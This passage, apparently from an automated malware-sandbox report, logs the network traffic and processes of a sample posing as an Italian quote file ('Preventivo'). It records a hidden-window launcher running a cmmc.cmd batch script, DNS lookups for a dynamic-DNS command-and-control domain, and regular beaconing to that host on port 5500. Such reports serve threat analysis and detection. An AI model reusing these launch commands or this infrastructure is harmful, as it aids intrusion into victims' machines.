                                                                            Jan 23, 2024 12:18:18.124546051 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.124893904 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.124893904 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.124977112 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.365804911 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.367043018 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.367068052 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.368156910 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.368288040 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.368294954 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.368382931 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.368896961 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.368980885 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.368985891 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.369035959 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.488894939 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.488907099 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.661247969 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.661262035 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.661279917 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.661329985 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.661340952 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:18.661367893 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.661389112 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.743396997 CET49740443192.168.2.452.202.204.11
                                                                            Jan 23, 2024 12:18:18.743443966 CET4434974052.202.204.11192.168.2.4
                                                                            Jan 23, 2024 12:18:22.051400900 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.051444054 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.051523924 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.051836014 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.051851988 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.367913008 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.368402958 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.368437052 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.369436979 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.369497061 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.408909082 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.409085035 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.409183979 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.453907967 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.486505032 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.486571074 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.515590906 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:22.515680075 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.516412020 CET49747443192.168.2.423.54.200.159
                                                                            Jan 23, 2024 12:18:22.516447067 CET4434974723.54.200.159192.168.2.4
                                                                            Jan 23, 2024 12:18:25.620049000 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:25.742728949 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:18:25.744896889 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:25.746346951 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:25.770776987 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:25.893244028 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:18:35.908354044 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:36.031210899 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:18:46.033581018 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:46.156461954 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:18:56.174005032 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:18:56.297275066 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:06.299117088 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:06.422399998 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:16.425880909 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:16.548703909 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:26.549020052 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:26.671834946 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:36.676428080 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:36.799540997 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:46.814779997 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:46.937870979 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:19:56.955323935 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:19:57.078058958 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:07.080303907 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:07.203185081 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:17.205255032 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:17.327846050 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:27.330341101 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:27.453284979 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:37.455410957 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:37.578325987 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:47.580430031 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:47.703528881 CET550049749140.228.29.110192.168.2.4
                                                                            Jan 23, 2024 12:20:57.720922947 CET497495500192.168.2.4140.228.29.110
                                                                            Jan 23, 2024 12:20:57.843878031 CET550049749140.228.29.110192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 23, 2024 12:17:58.739626884 CET5942153192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:17:58.858447075 CET53594211.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:18:22.180207968 CET6489453192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:18:22.339932919 CET53648941.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:18:40.412035942 CET6021553192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:18:40.570370913 CET53602151.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:19:04.518619061 CET5383253192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:19:04.658823967 CET53538321.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:19:28.738209009 CET5038453192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:19:28.898479939 CET53503841.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:19:52.877954960 CET6324753192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:19:53.018186092 CET53632471.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:20:16.956233978 CET6237653192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:20:17.096158981 CET53623761.1.1.1192.168.2.4
                                                                            Jan 23, 2024 12:20:41.206412077 CET5407653192.168.2.41.1.1.1
                                                                            Jan 23, 2024 12:20:41.365834951 CET53540761.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 23, 2024 12:17:58.739626884 CET192.168.2.41.1.1.10xdb8cStandard query (0)www.example.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:18:22.180207968 CET192.168.2.41.1.1.10xb714Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:18:40.412035942 CET192.168.2.41.1.1.10xead6Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:04.518619061 CET192.168.2.41.1.1.10x7c5Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:28.738209009 CET192.168.2.41.1.1.10x49afStandard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:52.877954960 CET192.168.2.41.1.1.10xc325Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:20:16.956233978 CET192.168.2.41.1.1.10x3718Standard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:20:41.206412077 CET192.168.2.41.1.1.10x286fStandard query (0)vnvariant2024.ddnsfree.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 23, 2024 12:17:58.858447075 CET1.1.1.1192.168.2.40xdb8cNo error (0)www.example.com93.184.216.34A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:18:22.339932919 CET1.1.1.1192.168.2.40xb714No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:18:40.570370913 CET1.1.1.1192.168.2.40xead6No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:04.658823967 CET1.1.1.1192.168.2.40x7c5No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:28.898479939 CET1.1.1.1192.168.2.40x49afNo error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:19:53.018186092 CET1.1.1.1192.168.2.40xc325No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:20:17.096158981 CET1.1.1.1192.168.2.40x3718No error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            Jan 23, 2024 12:20:41.365834951 CET1.1.1.1192.168.2.40x286fNo error (0)vnvariant2024.ddnsfree.com140.228.29.110A (IP address)IN (0x0001)false
                                                                            • https:
                                                                              • p13n.adobe.io
                                                                            • armmf.adobe.com
                                                                            • www.example.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44972993.184.216.34805924C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 23, 2024 12:17:58.970385075 CET154OUTGET /download/updates.txt HTTP/1.1
                                                                            Accept: */*
                                                                            User-Agent: AdvancedInstaller
                                                                            Host: www.example.com
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jan 23, 2024 12:17:59.073906898 CET1286INHTTP/1.1 404 Not Found
                                                                            Accept-Ranges: bytes
                                                                            Age: 590017
                                                                            Cache-Control: max-age=604800
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Date: Tue, 23 Jan 2024 11:17:59 GMT
                                                                            Expires: Tue, 30 Jan 2024 11:17:59 GMT
                                                                            Last-Modified: Tue, 16 Jan 2024 15:24:22 GMT
                                                                            Server: ECS (agb/52BB)
                                                                            Vary: Accept-Encoding
                                                                            X-Cache: 404-HIT
                                                                            Content-Length: 1256
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62
                                                                            Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                            Jan 23, 2024 12:17:59.074006081 CET312INData Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                            Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973852.202.204.114437212C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-01-23 11:18:17 UTC1353OUTOPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                                            Host: p13n.adobe.io
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Access-Control-Request-Method: GET
                                                                            Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
                                                                            Origin: https://rna-resource.acrobat.com
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://rna-resource.acrobat.com/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-01-23 11:18:18 UTC508INHTTP/1.1 204 No Content
                                                                            Server: openresty
                                                                            Date: Tue, 23 Jan 2024 11:18:18 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, OPTIONS
                                                                            Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                                            Access-Control-Allow-Credentials: true
                                                                            Access-Control-Expose-Headers: x-request-id
                                                                            X-Request-Id: 8Dj2dD09FwtnTtee8qITRp7de9DZ5kcG


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44974052.202.204.114437212C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-01-23 11:18:18 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                                            Host: p13n.adobe.io
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Chromium";v="105"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                            Accept: application/json, text/javascript, */*; q=0.01
                                                                            x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37
                                                                            x-adobe-uuid-type: visitorId
                                                                            x-api-key: AdobeReader9
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Origin: https://rna-resource.acrobat.com
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Referer: https://rna-resource.acrobat.com/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            2024-01-23 11:18:18 UTC544INHTTP/1.1 200
                                                                            Server: openresty
                                                                            Date: Tue, 23 Jan 2024 11:18:18 GMT
                                                                            Content-Type: application/json;charset=UTF-8
                                                                            Content-Length: 7281
                                                                            Connection: close
                                                                            x-request-id: 4nwnn8HNcjSfATeUXDJ7GaIWAgdVR8TD
                                                                            vary: accept-encoding
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, OPTIONS
                                                                            Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                                            Access-Control-Allow-Credentials: true
                                                                            Access-Control-Expose-Headers: x-request-id
                                                                            2024-01-23 11:18:18 UTC7281INData Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 52 48 50 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 52 65 61 64 65 72 20 44 43 20 52 48 50 20 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 48 6c 77 5a 53 49 36 49 6d 4a 31 64 48 52 76 62 69 49 73 49 6e 52 6c 65 48 51 69 4f 69 4a 47 63 6d 56 6c 49 44 63 74 52 47 46 35 49 46 52 79 61 57 46 73 49 69 77 69 5a 32 39 66 64 58 4a 73 49 6a 6f 69 61 48 52 30 63 48 4d 36 4c 79 39 68 59 33 4a 76 59 6d 46 30
                                                                            Data Ascii: {"surfaces":{"DC_Reader_RHP_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","dataType":"application/json","data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44974723.54.200.1594437212C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-01-23 11:18:22 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                            Host: armmf.adobe.com
                                                                            Connection: keep-alive
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            If-None-Match: "78-5faa31cce96da"
                                                                            If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                            2024-01-23 11:18:22 UTC198INHTTP/1.1 304 Not Modified
                                                                            Content-Type: text/plain; charset=UTF-8
                                                                            Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                            ETag: "78-5faa31cce96da"
                                                                            Date: Tue, 23 Jan 2024 11:18:22 GMT
                                                                            Connection: close


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:12:17:57
                                                                            Start date:23/01/2024
                                                                            Path:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            Imagebase:0xe80000
                                                                            File size:5'955'744 bytes
                                                                            MD5 hash:32F35B78A3DC5949CE3C99F2981DEF6B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:12:18:00
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI="
                                                                            Imagebase:0x540000
                                                                            File size:59'904 bytes
                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:12:18:02
                                                                            Start date:23/01/2024
                                                                            Path:C:\Games\viewer.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
                                                                            Imagebase:0x610000
                                                                            File size:412'832 bytes
                                                                            MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:12:18:03
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:12:18:03
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
